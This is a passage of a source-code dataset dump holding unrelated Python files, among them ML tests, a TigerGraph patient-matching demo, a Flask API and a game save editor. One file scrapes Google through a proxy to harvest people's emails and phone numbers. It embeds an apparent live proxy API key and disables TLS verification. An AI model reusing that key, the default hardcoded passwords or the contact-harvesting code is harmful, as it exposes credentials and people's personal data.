randtool(\"float\", -2, 2, (4, 2, 4, 5))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave3():\n \"\"\"\n x: 5d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4, 4, 5))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave4():\n \"\"\"\n x: 5d-tensor\n axis = 1\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4, 4, 5))\n res = np.repeat(x, 2, axis=1)\n obj.run(res=res, x=x, repeats=2, axis=1)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave5():\n \"\"\"\n x: 5d-tensor\n axis = 3\n type: int\n \"\"\"\n obj.types = [np.int32, np.int64]\n obj.enable_backward = False\n x = randtool(\"int\", -2, 2, (4, 2, 4, 4, 5))\n res = np.repeat(x, 2, axis=3)\n obj.run(res=res, x=x, repeats=2, axis=3)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave6():\n \"\"\"\n x: 5d-tensor\n axis = 2\n type: int\n repeats:Tensor\n \"\"\"\n obj1 = TestRepeatInterleave(paddle.repeat_interleave)\n obj1.types = [np.int32, np.int64]\n obj1.enable_backward = False\n x = randtool(\"int\", -2, 2, (4, 2, 4, 4, 5))\n repeat = np.array([2, 4], dtype=np.int64)\n res = np.repeat(x, repeat, axis=1)\n obj1.run(res=res, x=x, repeats=repeat, axis=1)\n","sub_path":"framework/api/paddlebase/test_Tensor_repeat_interleave.py","file_name":"test_Tensor_repeat_interleave.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119620995","text":"# Debug function\ndef cssInfoDump(cssObjects,urlParts,path):\n fo = open(path+urlParts.hostname+'/'+'output.html',\"wb\")\n wrap = '''\n
    \n Not Used
    \n Used
    \n Found in JavaScript File
    *
    \n
    \n
    \n {}\n
    \n
    \n {}\n
    \n\n '''\n info = '''\n
    \n {}\n
    \n '''\n fileWrap = '''\n
    \n

    {}

    \n
    \n \n
    \n
    \n \n
    \n {}\n
    \n '''\n deadFileWrap = '''\n
    \n

    {}

    \n {}\n
    \n '''\n\n files = ''\n content = ''\n for css in cssObjects:\n\n\n pinfo = '

    Pages using this style sheet

      '\n for page in css.pageObjects:\n if page.url=='' or page.url==None:\n continue\n pinfo+= '
    • '+page.url+'
    • '\n pinfo +='
    '\n\n tagDiv = ''\n for tag in css.tagObjects:\n if len(tag.tags)==0 or tag.properties==None or len(tag.tagsFound)==0:\n continue\n tagDiv += tag.printUsed() \n tagDiv += tag.printProperties()\n\n\n\n if not css.fileExists:\n tagDiv = ''\n files+= deadFileWrap.format(css.path,pinfo)\n else:\n files+= fileWrap.format(css.path,pinfo) \n \n content+= info.format(tagDiv)\n\n fo.write(wrap.format(files,content))\n fo.close()\n\n","sub_path":"codebase/classes/PagePrinter.py","file_name":"PagePrinter.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27374309","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*\n\n\"\"\"DBPedia TitleFile Splitter\n\nSplit the file with titles as wiki IDs into lots of smaller files to help speed up processing in the next step\nSaves the result in the files in /WikiCat/Data/splitIDFiles/\n\nAdapted from https://stackoverflow.com/questions/546508/how-can-i-split-a-file-in-python\n\"\"\"\n\n# 10,000 lines per file\nsplitLen = 10000\noutputBase = 'titleLinks'\n\ninput = open('../Data/titleLinks.csv', 'r')\n\ncount = 0\nat = 0\ndest = None\nfor line in input:\n if count % splitLen == 0:\n if dest: dest.close()\n dest = open(outputBase + str(at) + '.csv', 'w')\n at += 1\n dest.write(line)\n count += 1\n","sub_path":"BiographyCorpus/Scripts/SplitIDs.py","file_name":"SplitIDs.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553449238","text":"import unittest\n\nimport jax.random as jrandom\nfrom jaxchem.models import GCNPredicator\n\n\n# params\nHIDDEN_FEATS = [64, 32, 16]\nPOOLING_METHOD = 'mean'\nPREDICATOR_HIDDEN_FEATS = 16\nN_OUT = 1\nBATCH_SIZE = 32\nMAX_NODE_SIZE = 30\nNODE_FEATURE_DIM = 64\n\n\nclass TestGCNPredicator(unittest.TestCase):\n \"\"\"Test GCNPredicator\"\"\"\n\n def setup_method(self, method):\n self.key = jrandom.PRNGKey(1234)\n self.input_data = self.__setup_data()\n self.models_fun = GCNPredicator(hidden_feats=HIDDEN_FEATS, pooling_method=POOLING_METHOD,\n predicator_hidden_feats=PREDICATOR_HIDDEN_FEATS,\n n_out=N_OUT)\n\n def __setup_data(self):\n self.key, k1, k2, k3 = jrandom.split(self.key, 4)\n batched_node_feats = jrandom.normal(k1, (BATCH_SIZE, MAX_NODE_SIZE, NODE_FEATURE_DIM))\n batched_adj = jrandom.normal(k2, (BATCH_SIZE, MAX_NODE_SIZE, MAX_NODE_SIZE))\n return (batched_node_feats, batched_adj, k3, True)\n\n def test_forward_shape(self):\n \"\"\"Test output shape of GCNPredicator\"\"\"\n init_fun, predict_fun = self.models_fun\n out_shape, params = init_fun(self.key, self.input_data[0].shape)\n preds = predict_fun(params, *self.input_data)\n assert preds.shape == out_shape\n assert preds.shape == (BATCH_SIZE, N_OUT)\n","sub_path":"tests/models/gcn/test_gcn_predicator.py","file_name":"test_gcn_predicator.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14621885","text":"\"\"\"\n * Copyright 2020-2021 Xilinx, Inc.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n\"\"\"\n\nimport time\nimport random as rand\nfrom pathlib import Path, PurePosixPath\nimport pyTigerGraph as tg\nimport os\n\n# Login Setup\nhostName = \"localhost\" # TG server hostname\nuserName = \"tigergraph\" # TG user name\npassWord = \"tigergraph\" # TG password\n\nloadGraph = True\nloadCache = True\nloadFPGA = True\n\npopulationSize = 1000 # Size of the total patient population\ntopK = 10 # Number of highest scoring patient matches\nnumDevices = 1 # Number of FPGA devices to distribute the queries to\n\n# Path Setup\nnotebookLocation = Path(os.getcwd() + \"/..\")\nqueryFileLocation = notebookLocation / \"query\"\n\nserverInstallLocation = PurePosixPath(\"/opt/xilinx/apps/graphanalytics/integration/Tigergraph-3.x/1.1/examples/synthea\")\nserverDataLocation = serverInstallLocation / \"1000_patients/csv\"\n\n# Utility Methods\ndef getPatient(id):\n patientList = conn.getVerticesById('patients', id)\n return [] if len(patientList) == 0 else patientList[0]\n\ndef getPatientName(patient):\n return patient['attributes']['FIRST_NAME'] + ' ' + patient['attributes']['LAST_NAME']\n\ndef printResults(result, newPatient):\n matches = result[0]['Matches']\n print(f'Matches for patient {getPatientName(newPatient)}')\n for m in matches:\n matchingPatient = getPatient(m['Id'])\n print(f'{m[\"score\"]} {getPatientName(matchingPatient)}')\n\nif __name__ == '__main__':\n\n\tif loadGraph:\n\t\t# Create New Graph\n\t\t# connect to TG server and create graph\n\t\tgraphName = f'xgraph_{userName}_{populationSize}' # TG graph name\n\t\tconn = tg.TigerGraphConnection(host='http://' + hostName, graphname='', username=userName, password=passWord, useCert=False)\n\t\tprint(\"\\n--------- Creating New graph ----------\")\n\t\tprint(conn.gsql(f'create graph {graphName}()', options=[]))\n\n\t\t# connect to TG server with new graph\n\t\tprint(f'Using graph {graphName}')\n\t\tconn = tg.TigerGraphConnection(host='http://' + hostName, graphname=graphName, username=userName, password=passWord, useCert=False)\n\t\t\n\t\t# Create Graph Schema\n\t\tprint(\"\\n--------- Creating New Schema ----------\")\n\t\tschemaFile = queryFileLocation / \"schema_xgraph.gsql\"\n\n\t\twith open(schemaFile) as fh:\n\t\t\tqStrRaw = fh.read()\n\t\t\tqStr = qStrRaw.replace('@graph', graphName)\n\t\t\tprint(conn.gsql(qStr))\n\t\t\t\n\t\t\n\t\t# Load graph data\n\t\tprint(\"\\n--------- Loading data into graph ----------\")\n\t\tloadFile = queryFileLocation / \"load_xgraph.gsql\"\n\n\t\twith open(loadFile) as fh:\n\t\t\tqStrRaw = fh.read()\n\t\t\tqStrRaw = qStrRaw.replace('@graph', graphName)\n\t\t\tqStr = qStrRaw.replace('$sys.data_root', str(serverDataLocation))\n\t\t\tprint(conn.gsql(qStr, options=[]))\n\t\t\tprint(conn.gsql(f\"USE GRAPH {graphName}\\n RUN LOADING JOB load_xgraph\"))\n\t\t\tprint(conn.gsql(f\"USE GRAPH {graphName}\\n DROP JOB load_xgraph\"))\n\t\t\t\n\t\t\n\t\t# Install Queries\n\t\tprint(\"\\n--------- Installing Queries ----------\")\n\t\tbaseQFile = queryFileLocation / \"base.gsql\"\n\t\tclientQFile = queryFileLocation / \"client.gsql\"\n\n\t\twith open(baseQFile) as bfh, open(clientQFile) as cfh:\n\t\t\tprint(\"installing base queries ...\")\n\t\t\tqStrRaw = bfh.read()\n\t\t\tqStr = qStrRaw.replace('@graph', graphName)\n\t\t\tprint(conn.gsql(qStr))\n\t\t\t\n\t\t\tprint(\"\\ninstalling client queries ...\")\n\t\t\tqStrRaw = cfh.read()\n\t\t\tqStr = qStrRaw.replace('@graph', graphName)\n\t\t\tprint(conn.gsql(qStr))\n\t\t\n\telse:\n\t\t# connect to TG server with existing graph\n\t\tprint(f'Using graph {graphName}')\n\t\tconn = tg.TigerGraphConnection(host='http://' + hostName, graphname=graphName, username=userName, password=passWord, gsqlVersion='3.1.1')\n\t\tprint(f'Found graph {graphName}')\n\t\n\t\n\t# Create Embeddings\n\tif loadCache or loadGraph:\n\t\tprint('Creating patient embeddings and storing them in patient vertices...')\n\t\ttStart = time.perf_counter()\n\t\tconn.runInstalledQuery('client_cosinesim_embed_vectors', timeout=240000000)\n\t\tconn.runInstalledQuery('client_cosinesim_embed_normals', timeout=240000000)\n\t\tprint(f'completed in {time.perf_counter() - tStart:.4f} sec')\n\t\t\n\n\t# Send embeddings to FPGA\n\tif loadFPGA or loadGraph:\n\t\tprint('Loading data into FPGA memory...')\n\t\tconn.runInstalledQuery('client_cosinesim_set_num_devices', {'numDevices': numDevices}, timeout=240000000)\n\t\ttStart = time.perf_counter()\n\t\tresultHwLoad = conn.runInstalledQuery('client_cosinesim_load_alveo', timeout=240000000)\n\t\tprint(f'completed in {time.perf_counter() - tStart:.4f} sec\\n')\n\t\n\t\n\t# Check status\n\tstatus = conn.runInstalledQuery('client_cosinesim_get_alveo_status', timeout=240000000)\n\tisInit = status[0][\"IsInitialized\"]\n\tnumDev = status[0][\"NumDevices\"]\n\tprint(f'FPGA Init: {isInit}, Dev: {numDev}\\n')\n\t\n\t# Compute Cosine Similarity\n\tprint('Running Query...')\n\t# pick a random patient out of 100\n\ttargetPatients = conn.getVertices('patients', limit=100)\n\ttargetPatient = targetPatients[rand.randint(0,99)]\n\n\t# run similarity on the choosen patient\n\tresultHW = conn.runInstalledQuery('client_cosinesim_match_alveo',\n\t\t\t\t\t\t\t\t\t {'newPatient': targetPatient['v_id'], 'topK': topK}, timeout=240000000)\n\t\t\t\t\t\t\t\t\t \n\tprintResults(resultHW, targetPatient)\n\tresHWTime = resultHW[0][\"ExecTimeInMs\"]\n\tprint(f'\\nQuery completed in {resHWTime:.2f} msec')\n","sub_path":"plugin/tigergraph/recomengine/examples/synthea/python/TG_demo.py","file_name":"TG_demo.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415102905","text":"import argparse\nimport numpy as np\nimport os\nimport pdb\nimport sys\n\n\n\"\"\"Runs eval on specified model, and prints output to console.\n\n Takes model name as command line argument. e.g.\n python eval_short_panels.py \"MODEL_NAME\"\n\n Valid model names are defined in run_short_pane.sh, and are as follows:\n ['ce_iw', 'ce_sn', 'ce_miw',\n 'mmd_iw', 'mmd_sn', 'mmd_miw',\n 'cgan', 'upsample']\n\n\"\"\"\n\nmodel_name = sys.argv[1]\n#base_path = '/home/maurice/iwgn_multivariate/results_20runs' # Used in paper\nbase_path = '/home/maurice/iwgn_multivariate/results'\nmodel_run_names = [n for n in os.listdir(base_path) if model_name in n]\n\nFIXED_DIM_CHOICES = [2, 4, 10] # Defined by generative scripts.\n\nprint('Results: {}'.format(model_name))\nfor dim in FIXED_DIM_CHOICES:\n model_dim_combo = '{}_dim{}'.format(model_name, dim)\n # Fetch only runs for that model and dim.\n # e.g. checking if the identifier \"ce_iw_dim2\" is in \"ce_iw_dim2_run5\".\n runs = [name for name in model_run_names if model_dim_combo in name]\n mmd_run_means = []\n energy_run_means = []\n kl_run_means = []\n for run in runs:\n tail = 5\n # Fetch and store MMD results.\n mmd_run_scores_all = np.loadtxt(os.path.join(base_path, run, 'scores_mmd.txt'))\n mmd_run_scores_not_nan = mmd_run_scores_all[~np.isnan(mmd_run_scores_all)]\n mmd_run_scores = mmd_run_scores_not_nan[-10:]\n mmd_run_means.append(np.mean(mmd_run_scores))\n # Fetch and store energy results.\n energy_run_scores_all = np.loadtxt(os.path.join(base_path, run, 'scores_energy.txt'))\n energy_run_scores_not_nan = energy_run_scores_all[~np.isnan(energy_run_scores_all)]\n energy_run_scores = energy_run_scores_not_nan[-tail:]\n energy_run_means.append(np.mean(energy_run_scores))\n # Fetch and store KL results.\n kl_run_scores_all = np.loadtxt(os.path.join(base_path, run, 'scores_kl.txt'))\n kl_run_scores_not_nan = kl_run_scores_all[~np.isnan(kl_run_scores_all)]\n kl_run_scores = kl_run_scores_not_nan[-tail:]\n kl_run_means.append(np.mean(kl_run_scores))\n\n\n # Print summary statistic for the multiple runs of each experiment.\n # PRINT MEAN RESULTS\n type_to_report = 'min' # ['mean', 'min']\n if type_to_report == 'mean':\n print((' {} (n={}) MEAN: MMD {:.4f} +- {:.4f}, E: {:.4f} +- {:.4f}, '\n 'KL: {:.4f} +- {:.4f}').format(\n model_dim_combo, len(mmd_run_means),\n np.mean(mmd_run_means), np.std(mmd_run_means),\n np.mean(energy_run_means), np.std(energy_run_means),\n np.mean(kl_run_means), np.std(kl_run_means)))\n elif type_to_report == 'min':\n print((' {} (n={}) MIN: MMD {:.4f},{:.4f}, E: {:.4f},{:.4f}, '\n 'KL: {:.4f},{:.4f}').format(\n model_dim_combo, len(mmd_run_means),\n np.min(mmd_run_means), np.std(mmd_run_means),\n np.min(energy_run_means), np.std(energy_run_means),\n np.min(kl_run_means), np.std(kl_run_means)))\nprint\n","sub_path":"eval_short_panel.py","file_name":"eval_short_panel.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561417591","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('message', '0005_shorturl'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='wasa2il_usage',\n field=models.CharField(default=b'any', max_length=12, choices=[(b'any', b'Does not matter'), (b'are_users', b'Recipients are wasa2il users'), (b'not_users', b'Recipients are not wasa2il users')]),\n ),\n ]\n","sub_path":"message/migrations/0006_message_wasa2il_usage.py","file_name":"0006_message_wasa2il_usage.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598440270","text":"from app.api import bp\nfrom app.models import Product\nfrom flask import jsonify, request\nfrom ..utils import helpers, constants\nfrom app.inventory import update as uinventory\n\n\ndef is_product_exist_response(pid, exist):\n if exist:\n status = constants.REST_API_SUCCESS\n message = constants.REST_API_PRODUCT_EXIST_MESSAGE.format(pid)\n else:\n status = constants.REST_API_ERROR\n message = constants.REST_API_PRODUCT_NOT_EXIST_MESSAGE.format(pid)\n\n return jsonify({\n constants.REST_API_STATUS: status,\n constants.REST_API_DATA:{\n constants.REST_API_PID: pid,\n constants.REST_API_EXISTS: exist\n },\n constants.REST_API_MESSAGE: message\n })\n\n\n@bp.route(constants.API_GET_PRODUCT_URL, methods=[constants.GET])\ndef get_product(id):\n return jsonify(Product.query.get_or_404(id).to_json())\n\n\n@bp.route(constants.API_PRODUCT_EXIST_URL, methods=[constants.GET])\ndef is_product_exist(id):\n exist_in_products = helpers.is_product_exist(pid=id)\n\n if not exist_in_products:\n return is_product_exist_response(id, exist_in_products)\n\n exists_in_inventory = helpers.is_product_exist_in_inventory(pid=id)\n if not exists_in_inventory:\n helpers.add_product_in_inventory(pid=id)\n\n status = helpers.is_product_exist_in_inventory(pid=id)\n return is_product_exist_response(id, status)\n\n\ndef add_product_response(pid, is_add):\n if is_add:\n status = constants.REST_API_SUCCESS\n message = constants.REST_API_ADDED_PRODUCT_SUCCESSFULLY_MESSAGE.format(pid)\n else:\n status = constants.REST_API_ERROR\n message = constants.REST_API_ADD_PRODUCT_FAILED_MESSAGE.format(pid)\n\n return jsonify({\n constants.REST_API_STATUS: status,\n constants.REST_API_MESSAGE: message\n })\n\n\n@bp.route(constants.API_ADD_PRODUCT_URL, methods=[constants.POST])\ndef add_product():\n is_add = False\n try:\n data = request.get_json() or {}\n product = Product()\n product.from_dict(data)\n helpers.insert_to_db(product)\n\n # update inventory\n uinventory.add_product(product.id, product.name, helpers.get_quantity(product.quantity))\n\n is_add = True\n except:\n return add_product_response(product.id, is_add)\n\n return add_product_response(product.id, is_add)\n\n\n\n","sub_path":"app/api/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552335447","text":"import numpy as np\nimport scipy.optimize as sopt\n\n#from util import *\n\n# Lagrange Dual Function to be maximized w/r/t lambda_vars\n# Returns negative value because we want to maximize it using a minimization function\n\nTr = np.trace\n\n\ndef lagrange_dual_factory(X, S, c_const):\n \n def mini_me(lambda_vars):\n Lambda = np.diag(lambda_vars)\n\n return (\n -1 * Tr(X.T @ X) \n - Tr((X @ S.T) @ (np.linalg.pinv(S @ S.T + Lambda)) @ (X @ S.T).T)\n - Tr(c_const * Lambda)\n )\n\n return mini_me\n\n\ndef lagrange_dual_learn(X, S, c_const, L_init = None, method = 'CG'):\n\n # Initial guess = x0. If none, set to zeros (optimal for near optimal bases)\n if L_init is None:\n L_init = np.zeros(S.shape[0])\n\n # Solve for optimal lambda\n lambda_vars = sopt.minimize(lagrange_dual_factory(X, S, c_const), L_init, method=method,)\n\n # Set Lambda\n Lambda = np.diag(lambda_vars.x)\n\n # Returns B^T, for B corresponding to basis matrix\n B = (np.linalg.pinv(S @ S.T + Lambda) @ (X @ S.T).T).T\n\n return B\n \n\n\n\n\n\n\n# * LAZY BOI TESTS\n# n0 = 60\n# m0 = 50\n# k0 = 30\n# print(lagrange_dual_learn(S = np.random.randint(5, size = (n0,m0)), X = np.random.randint(5, size = (k0,m0)), n = n0, c_const = 0.001))\n\n \n \n \n# * FILLER, not permanent\n# return (X @ np.linalg.inv(S)).T\n\n\n# * old code:\n# def mini_me(lambda_vars):\n# Lambda = np.diag(lambda_vars)\n \n# trace_mat1 = X.T @ X\n# trace_mat2 = X @ S.T\n# trace_mat3 = np.linalg.inv(S @ S.T + Lambda)\n# trace_mat4 = (X @ S.T).T\n# trace_mat5 = c_const * Lambda\n\n# return -1 * np.trace(trace_mat1) - np.trace(trace_mat2 @ trace_mat3 @ trace_mat4) - np.trace(trace_mat5)\n\n\n\n\n","sub_path":"SR_LSA/lagrange_dual_learn.py","file_name":"lagrange_dual_learn.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232791844","text":"# https://www.laurentluce.com/posts/solving-mazes-using-python-simple-recursivity-and-a-search/\n\nclass node:\n def __init__(self, location):\n self.left = None\n self.up = None\n self.right = None\n self.down = None\n\n \n\n# find shortest path from start to goal on board with walls\n# can move up down left right but not through walls\n\n# board with boolean values\n# 1 = wall\n# 0 = open\n# 2 = goal\n# 3 = visited\nboard = [\n [0,1],\n [0,2]\n]\n# start point\nstart = [0,0]\n# end point\ngoal = [1,1]\n\nmin_possible_answer = abs(goal[0]) + abs(goal[1]) - abs(start[0]) - abs(start[1])\nmax_possible_answer = len(board) * len(board[0])\n\n# build a min cost matrix working backwards from the goal\n# from left from above from right from below\n# goal-1 1 NULL NULL NULL\n# goal-2 NULL \nshortest_path_matrix = [\n [max_possible_answer, max_possible_answer],\n [max_possible_answer, max_possible_answer],\n]\n#shortest_path_matrix = [] # start\n#for i in range(len(board)):\n# for j in range(len(board[0])):\n# if board[i][j] == 1:\n# shortest_path_matrix[i][j] = 99\n\n#def get_adjacent_tiles(cur_x: int, cur_y: int, max_x: int, max_y: int):\n# adj = []\n # above\n #if \n\n\ngrid = [[0, 0, 0, 0, 0, 1],\n [1, 1, 0, 0, 0, 1],\n [0, 0, 0, 1, 0, 0],\n [0, 1, 1, 0, 0, 1],\n [0, 1, 0, 0, 1, 0],\n [0, 1, 0, 0, 0, 2]]\n\ndef search(x, y):\n if grid[x][y] == 2:\n print('found at %d,%d' % (x, y))\n return True\n elif grid[x][y] == 1:\n print('wall at %d,%d' % (x, y))\n return False\n elif grid[x][y] == 3:\n print('visited at %d,%d' % (x, y))\n return False\n \n print('visiting %d,%d' % (x, y))\n\n # mark as visited\n grid[x][y] = 3\n\n # explore neighbors clockwise starting by the one on the right\n if ((x < len(grid)-1 and search(x+1, y))\n or (y > 0 and search(x, y-1))\n or (x > 0 and search(x-1, y))\n or (y < len(grid)-1 and search(x, y+1))):\n return True\n\n return False\n\nsearch(0, 0)","sub_path":"daily/daily_20190509.py","file_name":"daily_20190509.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368027403","text":"from vplot import GetOutput\nimport subprocess\nimport matplotlib.pyplot as pl\nimport os\ndir_fw = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"forward\")\ndir_bw = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"backward\")\nMyr = 1e6\n\n# Run forward and backward runs\nsubprocess.run(['vplanet', 'vpl.in', '-q'], cwd=dir_fw)\nsubprocess.run(['vplanet', 'vpl.in', '-q'], cwd=dir_bw)\n\n# Grab the output\nforward = GetOutput(path=dir_fw)\nbackward = GetOutput(path=dir_bw)\n\n# Plot\nfig, ax = pl.subplots(2)\nax[0].set_ylabel('Semi Major Axis [AU]', fontweight='bold')\nax[1].set_ylabel('Eccentricity', fontweight='bold')\nax[1].set_xlabel('Time [Myr]', fontweight='bold')\nax[0].plot(forward.a.Time / Myr, forward.a.SemiMajorAxis,\n label='forward')\nax[1].plot(forward.a.Time / Myr, forward.a.Eccentricity,\n label='forward')\nax[0].plot(300 + backward.a.Time / Myr, backward.a.SemiMajorAxis,\n label='backward')\nax[1].plot(300 + backward.a.Time / Myr, backward.a.Eccentricity,\n label='backward')\nax[0].legend(loc='lower right')\nax[1].legend(loc='lower right')\npl.show()\n","sub_path":"examples/backward/backward.py","file_name":"backward.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577463347","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport warnings\nwarnings.filterwarnings('ignore')\nheaders = {\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-us;q=0.5,en;q=0.3',\n 'connection': 'keep-alive',\n 'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'\n}\n\nurl = 'https://www.google.com/search'\n# proxies = {\"http\": \"127.0.0.1:1080\", \"https\": \"127.0.0.1:1080\"}\nproxy_host = \"proxy.crawlera.com\"\nproxy_port = \"8010\"\nproxy_auth = \"0b3d10012b61488aa0667b27c829d5de:\"\nproxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n\n\n# 爬取网页返回soup对象\ndef make_soup_google(payloads):\n content = ''\n try:\n html = requests.get(\n url,\n params=payloads,\n headers=headers,\n proxies=proxies,\n verify=False\n )\n html.encoding = \"utf-8\"\n content = html.text\n except Exception as e:\n print(e)\n\n if content is not None and len(content) > 0:\n return BeautifulSoup(content, 'lxml')\n else:\n return None\n\n\ndef get_email_and_phone(key_words):\n payloads = {\n \"q\": key_words + ' and email and phone',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return '', ''\n\n # 获取摘要\n tag_results = soup.select(\"span[class='st']\")\n results = {str(tr)\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '') for tr in tag_results}\n\n emailRegex = re.compile(r\"\"\"([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+(\\.[a-zA-Z]{2,4}))\"\"\", re.VERBOSE)\n emailFilterRegex = re.compile(r\"\"\"^[Ee]-?mail\"\"\")\n\n phoneRegex = re.compile(r\"\"\"([Pp]hone|[Mm]obile)[,:]?\\s*(\\+\\s?[\\d]+\\s?)?(\\([\\d\\-. ]+\\)\\s{0,2})*(\\d+[/.-]?\\s?)*\"\"\", re.VERBOSE)\n phoneFilterRegex = re.compile(r\"\"\"([Pp]hone|[Mm]obile)[,:]?\\s*\"\"\")\n\n email = str()\n phone = str()\n # 每一条摘要\n for r in results:\n pho = phoneRegex.search(r)\n pho_no = phoneFilterRegex.sub('', pho.group()).strip() if pho is not None else ''\n phone = pho_no if len(pho_no) > len(phone) else phone\n\n ems = [emailFilterRegex.sub('', e).strip() for a in emailRegex.findall(r) for e in a]\n for e in ems:\n email = e if len(e) > len(email) else email\n return email, phone\n\n\ndef get_address(affiliation):\n payloads = {\n \"q\": 'where is ' + affiliation.split(';')[0] + 'located?',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"div[class='Z0LcW']\")\n address = tag_results[0].getText() if len(tag_results) > 0 else ''\n return address\n\n\ndef get_country(affiliation):\n payloads = {\n \"q\": 'what country is ' + affiliation.split(';')[0] + ' in?',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"div[class='Z0LcW']\")\n country = tag_results[0].getText() if len(tag_results) > 0 else ''\n return country if country is not None else ''\n\n\ndef get_language(country):\n payloads = {\n \"q\": 'what language do they speak in ' + country + '?',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"div[class='Z0LcW']\")\n language = tag_results[0].getText() if len(tag_results) > 0 else ''\n return language\n\n\ndef get_position(key_words):\n payloads = {\n \"q\": key_words + ' professor or researcher or scientist',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"span[class='st']\")\n results = {str(tr)\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '') for tr in tag_results}\n\n associateProfessorRegex = re.compile('''[Aa]ssociate\\s+[Pp]rofessor''')\n assistantProfessorRegex = re.compile('''[Aa]ssistant\\s+[Pp]rofessor''')\n professorRegex = re.compile('''[Pp]rofessor''')\n researcherRegex = re.compile('''[Rr]esearcher''')\n scientistRegex = re.compile('''[Ss]cientist''')\n\n # position需要设置优先级\n for r in results:\n if associateProfessorRegex.search(r):\n return 'Associate Professor'\n\n if assistantProfessorRegex.search(r):\n return 'Assistant Professor'\n\n if professorRegex.search(r):\n return \"Professor\"\n\n if researcherRegex.search(r):\n return 'Researcher'\n\n if scientistRegex.search(r):\n return 'Scientist'\n\n return ' '\n\n\nif __name__ == \"__main__\":\n print(get_country('stanford university'))","sub_path":"Google_complement.py","file_name":"Google_complement.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21089259","text":"import os.path\n\n\ndef get_offset(character):\n ''' Find the offset of a character\n 1. Convert the string into a bytearray\n 2. Search for its offset\n '''\n\n with open(os.path.expanduser('~/DOS/Ultima_5/SAVED.GAM'), \"r+b\") as input_file: #open the \"SAVED.GAM\" file from the home directory\n file = input_file.read()\n b = bytearray()\n b.extend(map(ord, character))\n offset = file.index(b)\n input_file.close()\n return offset\n\n\ndef Modify(offset, value, isTwoByte):\n ''' The modification function\n : if: the hexadecimal value is two-byte long\n 1. A three-digit hexadecimal value\n 2. A two-digit hexadecimal value\n 3. A common four-digit hexadecimal value\n : else: the hexadecimal value is one-byte long\n '''\n\n with open(os.path.expanduser('~/DOS/Ultima_5/SAVED.GAM'), \"r+b\") as file: #open the \"SAVED.GAM\" file from the home directory\n file.seek(offset)\n hex_value = hex(value).split('x')[-1]\n if(isTwoByte):\n if(value < 4096 and value > 255):\n file.write(bytearray([int(hex_value[1:3],16)]))\n file.seek(offset+1)\n file.write(bytearray([int(hex_value[0],16)]))\n elif(value < 256):\n file.write(bytearray([int(hex_value[0:2],16)]))\n 